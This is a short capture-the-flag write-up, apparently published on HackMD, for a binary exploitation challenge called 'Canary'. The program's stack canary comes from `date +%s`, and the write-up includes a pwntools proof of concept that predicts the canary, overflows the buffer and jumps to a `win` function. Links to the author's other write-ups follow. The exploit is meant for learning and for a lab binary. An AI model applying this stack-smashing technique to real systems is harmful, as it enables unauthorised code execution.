# Canary ![](https://hackmd.io/_uploads/SknBP8D03.png) Main function will execute command `date +%s` and turn the return value into an int, which will be a canary value to prevent stack overflow in `read_in`. What we can do is knowing that canary by executing `date +%s`, and use that value to bypass the canary protection. Then all we need to do is overwrite return address to `win` function address and cat the flag. ## POC ```python from pwn import * r = process(["date", "+%s"]) canary = int(r.recvline(0).decode()) win = 0x8049296 r = process("./canary") payload = b'A' * 0x2c + p32(canary) + b"B" * 0xc + p32(win) r.sendline(payload) r.interactive() ```
Last changed by  
MochiNishimiya
137

Read more

image

image

2/24/2024
Tiny

The challenge is really simple:

9/6/2023
BabyStack

Đây là một file PE 64 bit, khi mình mở ra và sau khi nhìn quanh một hồi mình nhận thấy chương trình được viết bằng C++, và vẫn còn các symbol của class được để lại:

8/20/2023
ACSC 2023 Qual Writeups

Welcome ACSC{W3lc0m3_t0_ACSC_2023_g00d_luck!} Merkle Hellman (Crypto) The challenge provides source code of the encryption routine and an encrypted flag file. The only important information in the encryption routine is from this peice of code: # ..... (Not important) # Encrypting c = [] for f in flag:

2/26/2023
Read more from MochiNishimiya
Published on HackMD